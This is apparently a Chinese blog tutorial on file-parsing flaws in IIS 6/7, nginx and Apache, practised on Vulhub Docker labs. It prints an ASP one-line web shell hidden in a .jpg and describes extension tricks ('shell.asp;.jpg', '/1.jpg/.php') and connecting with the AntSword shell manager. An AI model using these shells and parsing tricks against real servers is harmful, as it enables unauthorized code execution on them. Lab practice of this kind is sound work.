文件解析漏洞中间件(iis和Apache)

发布于:2024-12-23 ⋅ 阅读:(14) ⋅ 点赞:(0)

IIS解析漏洞

IIS6.X

#环境
Windows Server 2003

在iis6.x中,.asp文件夹中的任意文件都会被当做asp文件去执行

在默认网站里创建一个a.asp文件夹并创建一个1.jpg写进我们的asp代码

<%=now()%>
#asp一句话
<%eval request("h")%>

单独创建一个1.jpg发现并不能解析

在a.asp下被解析

在IIS 6 处理文件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是

shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer\cdx

IIS7.X

在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在⼀个文件路径/xx.jpg

后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。

php.ini里的cgi.fix_pathinfo=1 开启

IIS7在Fast-CGI运行模式下

#环境
PHPstudy for IIS

配置 php.ini 文件,将 cgi.fix_pathinfo=1 注释取消掉;并重启

IIS -->配置网站-->处理程序映射-->PHPStudy_FastCGI -->请求限制 -->取消勾

然后在网站下创建我们的shell;并命名为1.jpg

去网站访问他

加上/.php就可以被解析为php文件

蚁剑连接一下

nginx解析漏洞

靶场安装

docker

查看docker容器是否安装,若未安装,执行下面的命令

yum install docker
yum install docker-compose
docker -v
docker-compose -v
yum install git
git clone https://github.com/vulhub/vulhub.git
ls

cd vulhub/

1.Vulhub靶场nginx_parsing

我们可以发现里面有很多靶场,找到我们需要的nginx靶场环境

cd nginx/
ls

选择这一关进入

cd nginx_parsing_vulnerability/
docker-compose up -d

docker ps

这样就可以看到这一关的端口号为:80,浏览器访问

写一个图片马

2.Vulhub靶场CVE-2013-4547

我们可以发现里面有很多靶场,找到我们需要的nginx靶场环境

cd nginx/
ls

选择这一关进入

cd CVE-2013-4547/
docker-compose up -d

docker ps

这样就可以看到这一关的端口号为:8080,浏览器访问

修改为00,然后放行

Apache解析漏洞

1.Vulhub靶场apache_parsing_vulnerability

我们可以发现里面有很多靶场,找到我们需要的靶场环境

cd vulhub/
cd  httpd/ 
ls

选择这一关进入

cd apache_parsing_vulnerability/
docker-compose up -d

docker ps

这样就可以看到这一关的端口号为:8080,浏览器访问

警告不用搭理

用蚁剑连接

2.Vulhub靶场CVE-2017-15715